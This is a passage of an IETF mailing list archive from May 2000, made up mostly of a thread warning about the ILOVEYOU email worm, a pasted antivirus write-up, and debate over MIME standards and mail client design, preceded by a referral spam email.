for [EMAIL PROTECTED]; Thu, 4 May 2000 04:40:02 -0400 (EDT)
Received: from mail.virtualpostman.com (kopl300051.virtualpostman.com [164.109.30.222])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id EAA00984
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 04:30:05 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
Received: from 10.100.48.21 (10.100.48.21:1454) by mail.virtualpostman.com (LSMTP for
Windows NT v1.1b) with SMTP id <[EMAIL PROTECTED]>; Thu, 4 May 2000
4:27:58 -0400
From: "Winvite.com" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Helen Kolesnikova invites you to Win $4,500
Date: Thu, 4 May 2000 04:30:13 -0400
X-Mailer: Allaire ColdFusion Application Server
X-Loop: [EMAIL PROTECTED]
Hi Friend,
Take a few seconds to answer 3 survey questions and Win $4,500 from Winvite.com.
If you win $4,500, I win $4,500 too. It's 100% free, see for yourself.
CLICK HERE: http://www.winvite.com/index.cfm?[EMAIL PROTECTED]
- Helen Kolesnikova
__________________________________________________
This email was sent to you through the Winvite.com (formerly Mailbonus.com) website by:
Your Friend, Helen Kolesnikova at [EMAIL PROTECTED]
>From owner-ietf-outbound Thu May 4 06:50:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id GAA02083
for [EMAIL PROTECTED]; Thu, 4 May 2000 06:50:02 -0400 (EDT)
Received: from arcc.or.ke (root@[212.49.87.254])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id GAA01956
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 06:38:28 -0400 (EDT)
Received: from 199.2.222.254 ([212.49.87.154])
by arcc.or.ke (8.9.3/8.9.3) with SMTP id NAA16943
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 13:58:26 +0300 (EAT)
Date: Thu, 4 May 2000 13:58:26 +0300 (EAT)
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: [EMAIL PROTECTED]
From: Musandu <[EMAIL PROTECTED]>
Subject: Internet Financial Devices are mostly proprietary
X-Loop: [EMAIL PROTECTED]
Most of the time when you subscribe to a financial service on the internet,
e.g a digital wallet or peripheral device for charging debit cards, your
money becomes proprietary i.e you spend it only as allowed by the service
provider or charging of financial debit devices can only be under taken
using technology developed by the financial services vendor in question.
Does the Internet Engineering Task Force have an interest in encouraging
Open Financial Systems and Peripheral Devices for the internet?
This would allow the a wide market variety for people using these
technologies as well as change over alternatives when a financial services
vendor proves unreliable.
Yours sincerely,
Nyagudi Musandu
>From owner-ietf-outbound Thu May 4 09:31:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA05719
for [EMAIL PROTECTED]; Thu, 4 May 2000 09:30:02 -0400 (EDT)
Received: from localhost.localdomain (IDENT:root@[204.214.6.250])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA05662
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 09:27:42 -0400 (EDT)
Received: from tech20 ([204.214.6.254])
by localhost.localdomain (8.9.3/8.8.7) with SMTP id JAA04601;
Thu, 4 May 2000 09:26:39 -0400
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Subject: VIRUS WARNING
Date: Thu, 4 May 2000 09:27:19 -0400
Message-ID: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
In-Reply-To: <[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
The is an e-mail virus going around. The subject of the e-mail is
ILOVEYOU...I suggest you delete it the moment you receive it.
-Scot Mc Pherson, N2UPA
-Sr. Network Analyst
-ClearAccess Communications
-Ph: 941.744.5757 ext. 210
-Fax: 941.744.0629
-mailto:[EMAIL PROTECTED]
-http://www.clearaccess.net
>From owner-ietf-outbound Thu May 4 10:40:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA06942
for [EMAIL PROTECTED]; Thu, 4 May 2000 10:40:02 -0400 (EDT)
Received: from localhost.localdomain (IDENT:root@[204.214.6.250])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA06811
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 10:35:02 -0400 (EDT)
Received: from tech20 ([204.214.6.254])
by localhost.localdomain (8.9.3/8.8.7) with SMTP id KAA04877;
Thu, 4 May 2000 10:34:00 -0400
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>,
"Brian Duddy (E-mail)" <[EMAIL PROTECTED]>,
"Kevin Speilman (E-mail)" <[EMAIL PROTECTED]>,
"Michael F. Young (E-mail)" <[EMAIL PROTECTED]>,
"Perry Lewis (E-mail)" <[EMAIL PROTECTED]>,
"Robert E Sollmann (E-mail)" <[EMAIL PROTECTED]>,
"Roger Shepheard (E-mail)" <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 4 May 2000 10:34:37 -0400
Message-ID: <00dc01bfb5d5$e0414a60$[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
In-Reply-To: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
The file subject: ILOVEYOU
Name of attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
DO NOT OPEN THE ATTACHMENT.
At this time very little is known about the virus. If you have opened the
file, please see your network administrator for help.
The following link to Symantec has info on what the file does to your
system.
http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html
Since the webpage is too busy to access I am copying the text portions of
the webpage here
VBS.LoveLetter.A
This is an email worm, mIRC worm, and file infector.
Also known as:
Category: Worm
Infection length: 10307
Virus definitions: Pending
Threat assessment:
Damage:
High
Distribution:
High
Wildness:
High
Wild
Number of infections: More than 1000
Number of sites: More than 10
Geographic distribution: High
Threat containment: Moderate
Removal: Moderate
Damage Payload:
Large scale e-mailing: All the addresses in Microsoft Outlook address book
Degrades performance: May clog mail servers
Distribution
Subject of e-mail: ILOVEYOU
Name of attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
Size of attachment: 10307
Technical description:
This is a preliminary writeup. The information contained within is to
provide as much information as possible at this time.
VBS.LoveLetter.A is an email worm, mIRC worm, and a file infector.
VBS.LoveLetter.A will use Microsoft Outlook and email itself out as an
attachment with the above subject line and attachment name. The body of the
message will be
kindly check the attached LOVELETTER coming from me.
The virus will also infect files with the following extensions: vbs, vbe,
js, jse, css, wsh, sct, hta, jpg, jpeg, mp3, and mp2
The virus will insert the following files:
MSKernel32.vbs in the Windows System directory
Win32DLL.vbs in the Windows directory
LOVE-LETTER-FOR-YOU.TXT.vbs in the Windows System directory
WinFAT32.EXE in the Internet download directory
WIN-BUGSFIX.EXE in the Internet download directory
script.ini in the mIRC directory
SARC recommends Administrators filter on the attachment name and Subject
line immediately.
This writeup will be verified and formalized within the hour.
Removal:
Delete found infected files.
Write-up by: Eric Chien
Updated: May 4, 2000
Tell a Friend about this Write-Up
-----Original Message-----
From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 9:27 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: VIRUS WARNING
The is an e-mail virus going around. The subject of the e-mail is
ILOVEYOU...I suggest you delete it the moment you receive it.
-Scot Mc Pherson, N2UPA
-Sr. Network Analyst
-ClearAccess Communications
-Ph: 941.744.5757 ext. 210
-Fax: 941.744.0629
-mailto:[EMAIL PROTECTED]
-http://www.clearaccess.net
>From owner-ietf-outbound Thu May 4 10:50:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA07165
for [EMAIL PROTECTED]; Thu, 4 May 2000 10:50:02 -0400 (EDT)
Received: from torque.pothole.com ([209.94.126.195])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA07089
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 10:46:41 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1])
by torque.pothole.com (8.8.2/8.8.8) with SMTP id KAA02601
for [EMAIL PROTECTED]; Thu, 4 May 2000 10:48:12 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-Authentication-Warning: torque.pothole.com: localhost [127.0.0.1] didn't use HELO
protocol
To: <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Thu, 04 May 2000 09:27:19 EDT."
<00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 10:48:12 -0400
From: "Donald E. Eastlake 3rd" <[EMAIL PROTECTED]>
X-Mts: smtp
X-Loop: [EMAIL PROTECTED]
The whole world does not run software which is a good culture medium
for email viruses. I mostly use nice old UNIX software and it would
take a number of extra steps on my part for some embdedded virus to
get a chance to run. If your software automatically executes stuff
in attachments, you need to change your software, not develope a list
of subject lines you are freightened of.
Donald
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Date: Thu, 4 May 2000 09:27:19 -0400
Message-ID: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
In-Reply-To: <[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
>The is an e-mail virus going around. The subject of the e-mail is
>ILOVEYOU...I suggest you delete it the moment you receive it.
>
>-Scot Mc Pherson, N2UPA
>-Sr. Network Analyst
>-ClearAccess Communications
>-Ph: 941.744.5757 ext. 210
>-Fax: 941.744.0629
>-mailto:[EMAIL PROTECTED]
>-http://www.clearaccess.net
>
>From owner-ietf-outbound Thu May 4 11:00:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA07445
for [EMAIL PROTECTED]; Thu, 4 May 2000 11:00:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA07101
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 10:46:51 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta0/8.11.0.Beta0) with ESMTP id e44Ekbh33444;
Thu, 4 May 2000 10:46:37 -0400
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: exmh version 2.1.1 10/15/1999
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: THe Value Of Following Standards... (was Re: VIRUS WARNING)
In-reply-to: Your message of "Thu, 04 May 2000 09:27:19 EDT."
<00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 04 May 2000 10:46:33 -0400
X-Loop: [EMAIL PROTECTED]
On Thu, 04 May 2000 09:27:19 EDT, Scot Mc Pherson <[EMAIL PROTECTED]> said:
> The is an e-mail virus going around. The subject of the e-mail is
> ILOVEYOU...I suggest you delete it the moment you receive it.
Somebody didn't read RFC2046, section 2, where it talks about text/plain
being *TEXT*, and application/* being *application data*.
So if your e-mail software is opening it and feeding it to Visual Basic
just because it's tagged .vbs even though it's a text/plain, you're
violating the RFCs.
I'm not pointing fingers, but.... ;)
--
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Thu May 4 11:10:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA07772
for [EMAIL PROTECTED]; Thu, 4 May 2000 11:10:03 -0400 (EDT)
Received: from vrtx.co.uk ([EMAIL PROTECTED] [195.224.63.4])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA07356
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 10:56:18 -0400 (EDT)
Received: from localhost (james@localhost)
by vrtx.co.uk (8.9.3/8.8.8) with ESMTP id QAA22716;
Thu, 4 May 2000 16:03:18 +0100
Date: Thu, 4 May 2000 16:03:18 +0100 (BST)
From: A James Lewis <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-Reply-To: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
This is actually genuine for once... it's a vbscript..
On Thu, 4 May 2000, Scot Mc Pherson wrote:
> The is an e-mail virus going around. The subject of the e-mail is
> ILOVEYOU...I suggest you delete it the moment you receive it.
>
> -Scot Mc Pherson, N2UPA
> -Sr. Network Analyst
> -ClearAccess Communications
> -Ph: 941.744.5757 ext. 210
> -Fax: 941.744.0629
> -mailto:[EMAIL PROTECTED]
> -http://www.clearaccess.net
>
A. James Lewis ([EMAIL PROTECTED])
- Linux is swift and powerful. Beware its wrath...
>From owner-ietf-outbound Thu May 4 11:20:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA08111
for [EMAIL PROTECTED]; Thu, 4 May 2000 11:20:02 -0400 (EDT)
Received: from localhost.localdomain (IDENT:root@[204.214.6.250])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA07866
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 11:12:16 -0400 (EDT)
Received: from tech20 ([204.214.6.254])
by localhost.localdomain (8.9.3/8.8.7) with SMTP id LAA05054
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 11:11:15 -0400
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 4 May 2000 11:11:50 -0400
Message-ID: <00e101bfb5db$13959a60$[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
In-Reply-To: <[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Actually what happened, was I received this virus from a trusted friend who
just so happens would send an e-mail to me with that sort of "literary"
content to me as a joke. So as it happens it was a perfect trojan because it
slipped under my defenses by being something I would normally expect. My
software doesn't open attachments by default. Thus it was entirely my error.
I am just glad that I didn't have any e-mail lists in my "address book"
In fact to back up your statement, there are exactly 3 virii that infect
UNIX based systems.
Scot
-----Original Message-----
From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 10:48 AM
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
The whole world does not run software which is a good culture medium
for email viruses. I mostly use nice old UNIX software and it would
take a number of extra steps on my part for some embdedded virus to
get a chance to run. If your software automatically executes stuff
in attachments, you need to change your software, not develope a list
of subject lines you are freightened of.
Donald
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Date: Thu, 4 May 2000 09:27:19 -0400
Message-ID: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
In-Reply-To: <[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
>The is an e-mail virus going around. The subject of the e-mail is
>ILOVEYOU...I suggest you delete it the moment you receive it.
>
>-Scot Mc Pherson, N2UPA
>-Sr. Network Analyst
>-ClearAccess Communications
>-Ph: 941.744.5757 ext. 210
>-Fax: 941.744.0629
>-mailto:[EMAIL PROTECTED]
>-http://www.clearaccess.net
>
>From owner-ietf-outbound Thu May 4 11:30:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA08420
for [EMAIL PROTECTED]; Thu, 4 May 2000 11:30:02 -0400 (EDT)
Received: from ernst.netinsight.se (ernst.netinsight.se [194.16.221.130])
by ietf.org (8.9.1a/8.9.1a) with SMTP id LAA08244
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 11:24:56 -0400 (EDT)
Received: from localhost (unverified [10.100.1.11]) by ernst.netinsight.se
(EMWAC SMTPRS 0.83) with SMTP id <[EMAIL PROTECTED]>;
Thu, 04 May 2000 17:24:14 +0200
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
In-Reply-To: <[EMAIL PROTECTED]>
References: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
X-Mailer: Mew version 1.94.1 on Emacs 20.4 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 17:24:22 +0200
From: Magnus Danielson <[EMAIL PROTECTED]>
X-Dispatcher: imput version 991025(IM133)
Lines: 24
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
From: [EMAIL PROTECTED]
Subject: THe Value Of Following Standards... (was Re: VIRUS WARNING)
Date: Thu, 04 May 2000 10:46:33 -0400
> On Thu, 04 May 2000 09:27:19 EDT, Scot Mc Pherson <[EMAIL PROTECTED]> said:
> > The is an e-mail virus going around. The subject of the e-mail is
> > ILOVEYOU...I suggest you delete it the moment you receive it.
>
> Somebody didn't read RFC2046, section 2, where it talks about text/plain
> being *TEXT*, and application/* being *application data*.
>
> So if your e-mail software is opening it and feeding it to Visual Basic
> just because it's tagged .vbs even though it's a text/plain, you're
> violating the RFCs.
>
> I'm not pointing fingers, but.... ;)
You are missing the point here, this is user friendliness, the user is allowed
to do whatever he/she wants, even in others equipment with others data. ;)
It does make box managment so much easier ;)
Cheers,
Magnus
>From owner-ietf-outbound Thu May 4 11:50:29 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA09021
for [EMAIL PROTECTED]; Thu, 4 May 2000 11:50:02 -0400 (EDT)
Received: from alcove.wittsend.com (IDENT:[EMAIL PROTECTED] [130.205.0.28])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA08796
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 11:41:47 -0400 (EDT)
Received: (from mhw@localhost)
by alcove.wittsend.com (8.9.3/8.9.3) id KAA29748;
Thu, 4 May 2000 10:41:34 -0400
Date: Thu, 4 May 2000 10:41:34 -0400
From: "Michael H. Warfield" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
Message-ID: <[EMAIL PROTECTED]>
References: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.1.5i
In-Reply-To: <[EMAIL PROTECTED]>; from
[EMAIL PROTECTED] on Thu, May 04, 2000 at 10:46:33AM -0400
X-Loop: [EMAIL PROTECTED]
On Thu, May 04, 2000 at 10:46:33AM -0400, [EMAIL PROTECTED] wrote:
> On Thu, 04 May 2000 09:27:19 EDT, Scot Mc Pherson <[EMAIL PROTECTED]> said:
> > The is an e-mail virus going around. The subject of the e-mail is
> > ILOVEYOU...I suggest you delete it the moment you receive it.
> Somebody didn't read RFC2046, section 2, where it talks about text/plain
> being *TEXT*, and application/* being *application data*.
> So if your e-mail software is opening it and feeding it to Visual Basic
> just because it's tagged .vbs even though it's a text/plain, you're
> violating the RFCs.
> I'm not pointing fingers, but.... ;)
Your mailer may be able to display it as text (mine, Mutt, certainly
can) but it is definitely propagating as type application/octet-stream, not
text/plain. Wish we could lay that one on them, but we can't.
It's also now reported to be able to propagate across IRC.
> --
> Valdis Kletnieks
> Operating Systems Analyst
> Virginia Tech
Mike
--
Michael H. Warfield | (770) 985-6132 | [EMAIL PROTECTED]
(The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/
NIC whois: MHW9 | An optimist believes we live in the best of all
PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it!
>From owner-ietf-outbound Thu May 4 12:10:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA09710
for [EMAIL PROTECTED]; Thu, 4 May 2000 12:10:02 -0400 (EDT)
Received: from apollo.dmnews.com (mail.dmnews.com [204.141.161.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA09345
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 11:56:01 -0400 (EDT)
Received: by mail.dmnews.com with Internet Mail Service (5.5.2448.0)
id <HNLHMTT7>; Thu, 4 May 2000 12:02:28 -0400
Message-ID: <[EMAIL PROTECTED]>
From: Lillian Komlossy <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 4 May 2000 12:02:28 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Donald,
The whole world will not switch over to Unix
- the average user will always be more confortable with Windows
unless Unix will at one point offer the same seamless user-friendliness.
So it will always be a problem, one which cannot be solved by telling
others not to use what they've accustomed to - and one which cannot be
ignored.
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
-----Original Message-----
From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 10:48 AM
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
The whole world does not run software which is a good culture medium
for email viruses. I mostly use nice old UNIX software and it would
take a number of extra steps on my part for some embdedded virus to
get a chance to run. If your software automatically executes stuff
in attachments, you need to change your software, not develope a list
of subject lines you are freightened of.
Donald
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Date: Thu, 4 May 2000 09:27:19 -0400
Message-ID: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
In-Reply-To: <[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
>The is an e-mail virus going around. The subject of the e-mail is
>ILOVEYOU...I suggest you delete it the moment you receive it.
>
>-Scot Mc Pherson, N2UPA
>-Sr. Network Analyst
>-ClearAccess Communications
>-Ph: 941.744.5757 ext. 210
>-Fax: 941.744.0629
>-mailto:[EMAIL PROTECTED]
>-http://www.clearaccess.net
>
>From owner-ietf-outbound Thu May 4 12:20:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA09962
for [EMAIL PROTECTED]; Thu, 4 May 2000 12:20:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA09403
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 11:58:20 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id LAA22613;
Thu, 4 May 2000 11:57:49 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
In-reply-to: Your message of "Thu, 04 May 2000 10:46:33 EDT."
<[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 11:57:49 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> So if your e-mail software is opening it and feeding it to Visual Basic
> just because it's tagged .vbs even though it's a text/plain, you're
> violating the RFCs.
well there's nothing illegal about violating RFCs.
but it sure seems like the deliberate inclusion of a security hole in
email software would be sufficient grounds for a class action lawsuit.
Keith
>From owner-ietf-outbound Thu May 4 12:30:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA10284
for [EMAIL PROTECTED]; Thu, 4 May 2000 12:30:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA09470
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 12:00:28 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id MAA22636;
Thu, 4 May 2000 12:00:20 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: "Scot Mc Pherson" <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Thu, 04 May 2000 11:11:50 EDT."
<00e101bfb5db$13959a60$[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 12:00:20 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> Actually what happened, was I received this virus from a trusted friend
but of course you didn't receive the virus from a trusted friend;
you received it from an impostor.
now you know not to trust names that appear in a message header.
Keith
>From owner-ietf-outbound Thu May 4 12:40:16 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA10674
for [EMAIL PROTECTED]; Thu, 4 May 2000 12:40:04 -0400 (EDT)
Received: from localhost.localdomain (IDENT:root@[204.214.6.250])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA10173
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 12:25:34 -0400 (EDT)
Received: from tech20 ([204.214.6.254])
by localhost.localdomain (8.9.3/8.8.7) with SMTP id MAA05537;
Thu, 4 May 2000 12:24:32 -0400
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: "'Scot Mc Pherson'" <[EMAIL PROTECTED]>,
<[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>,
"'Brian Duddy (E-mail)'" <[EMAIL PROTECTED]>,
"'Kevin Speilman (E-mail)'" <[EMAIL PROTECTED]>,
"'Michael F. Young (E-mail)'" <[EMAIL PROTECTED]>,
"'Perry Lewis (E-mail)'" <[EMAIL PROTECTED]>,
"'Robert E Sollmann (E-mail)'" <[EMAIL PROTECTED]>,
"'Roger Shepheard (E-mail)'" <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 4 May 2000 12:25:36 -0400
Message-ID: <000201bfb5e5$61c06440$[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
In-Reply-To: <00dc01bfb5d5$e0414a60$[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
In addition to what has been posted by me earlier and what has been reported
on Symantec's site, I have learned the following.
When the virus is contracted (DONOT shut down the computer or reboot) The
worm is designed to propagate fully during system startup.
It should be noted that you should do a file search based on all files
created or modified the day the worm was downloaded...NOTE that the
timestamp is irrelevent, I found files that were created at a time when the
computer was not turned on so the worm is able to create modify this info...
In the registry file all references to the five files listed on your website
